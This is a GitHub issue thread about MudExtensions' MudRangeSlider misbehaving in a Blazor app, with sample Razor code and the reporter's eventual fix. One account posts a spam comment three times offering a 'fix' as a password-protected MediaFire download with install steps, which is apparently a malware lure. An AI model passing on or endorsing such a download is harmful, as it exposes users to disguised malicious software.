### ISSUE TITLE
MudRangeSlider displays double sliders and does not work as intended.

### ISSUE THREAD

**Issue by RhianneMoll** [CodeBeamOrg/CodeBeam.MudExtensions#452]
Hi,

I need to implement a 24-hour start/end time control in a new project of mine and thought a range slider would be more intuitive than the Blazor time picker.

I created a fresh Blazor sample app using:

``
dotnet new mudblazor --interactivity Auto --name MyApplication2 --all-interactive
``

...and installed the Extensions package using VS2022's Nuget package browser (the installed version is 7.0.1). I added a page Slider.razor to the example app, included the example code from the playground page and this is the result:

![Screenshot 2024-08-31 081843](https://github.com/user-attachments/assets/f7fad249-f905-4cdc-8949-a09057d88731)

I have tried the exercise using all three interactivity models and the result is the same. The displayed behaviour occurs on FireFox as well as Edge, so I reckon it's unlikely to be a browser issue... but...? *shrug*

Slider.razor:

```
@page "/slider"

<PageTitle>Range Slider</PageTitle>

<MudGrid>
    <MudItem xs="12" sm="8">
        <MudRangeSlider @bind-Value="@_value" @bind-UpperValue="@_upperValue" Size="Size.Large" Variant="Variant.Filled" ValueLabel="_valueLabel" Range="_range" TickMarks="_tickmarks" Immediate="true"
                        Min="_min" Max="_max" Step="_step" Display="_display" MinDistance="_minDistance" DisableMin="_disableMin" DisableMax="_disableMax" LabelText="@_labelText" UpperLabelText="@($"{_upperLabelText} {_upperValue}")">@_label</MudRangeSlider>
    </MudItem>

    <MudItem xs="12" sm="4">
        <MudStack>
            <MudTextField @bind-Value="_label" Label="Label" Variant="Variant.Outlined" Margin="Margin.Dense" />
            <MudTextField @bind-Value="_labelText" Label="Label Text" Variant="Variant.Outlined" Margin="Margin.Dense" />
            <MudTextField @bind-Value="_upperLabelText" Label="Upper Label Text" Variant="Variant.Outlined" Margin="Margin.Dense" />
            <MudNumericField @bind-Value="_value" Label="Lower Value" Variant="Variant.Outlined" Margin="Margin.Dense" />
            <MudNumericField @bind-Value="_upperValue" Label="Upper Value" Variant="Variant.Outlined" Margin="Margin.Dense" />
            <MudSwitchM3 @bind-Value="_valueLabel" Label="ValueLabel" Color="Color.Secondary" />
            <MudSwitchM3 @bind-Value="_range" Label="Range" Color="Color.Secondary" />
            <MudSwitchM3 @bind-Value="_tickmarks" Label="Tickmarks" Color="Color.Secondary" />
            <MudSwitchM3 @bind-Value="_disableMin" Label="DisableMin" Color="Color.Secondary" />
            <MudSwitchM3 @bind-Value="_disableMax" Label="DisableMax" Color="Color.Secondary" />
            <MudSwitchM3 @bind-Value="_display" Label="Display" Color="Color.Secondary" />
            <MudNumericField @bind-Value="_min" Label="Min" Variant="Variant.Outlined" Margin="Margin.Dense" />
            <MudNumericField @bind-Value="_max" Label="Max" Variant="Variant.Outlined" Margin="Margin.Dense" />
            <MudNumericField @bind-Value="_step" Label="Step" Variant="Variant.Outlined" Margin="Margin.Dense" />
            <MudNumericField @bind-Value="_minDistance" Label="Min Distance" Variant="Variant.Outlined" Margin="Margin.Dense" />
            <MudButton OnClick="ClearValues" Color="Color.Primary" Variant="Variant.Filled" Size="Size.Small">Clear Values</MudButton>
        </MudStack>
    </MudItem>
</MudGrid>

@code {
    private int _value = 25;
    private int _upperValue = 75;
    string _label = "Range";
    bool _valueLabel = true;
    bool _display = true;
    bool _range = true;
    bool _tickmarks = false;
    bool _disableMin = false;
    bool _disableMax = false;
    int _min = 0;
    int _max = 100;
    int _step = 1;
    int _minDistance = 2;
    string? _labelText;
    string? _upperLabelText;

    void ClearValues() {
        _value = 0;
        _upperValue = 50;
    }
}

```

I'm not sure what other information I can provide that will be of help. The example app is generated targeting .NET 8.0.

Thanks!

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by RhianneMoll** [comment]
Stupid I am not.

**Comment by RhianneMoll** [comment]
Well duh. Browsing the readme,md on github, I hadn't added the stylesheet or js links to the main html template as instructed. It works now.

**Comment by Pawel-OnTwo** [comment]
Maybe i don't get it, but should RangeSlider works in 7.1.0 ?
I just made Slider.razor in my project and copied example code and its just not working, it looks like right slider changes lower value and left slider changes max value
![image](https://github.com/user-attachments/assets/a8dc67ca-03e5-40d4-a06f-a48157c36313)

**Comment by ghost2121212** [comment]
Hello, maybe i don't get it, but should it works in 7.1.0 ?
I just tried example code on new page and its just not working, looks like right slider changes min value and left slider changes max value so its just mess up at all
![image](https://github.com/user-attachments/assets/18d91c15-502b-4e36-9937-e931cd8fa10a)
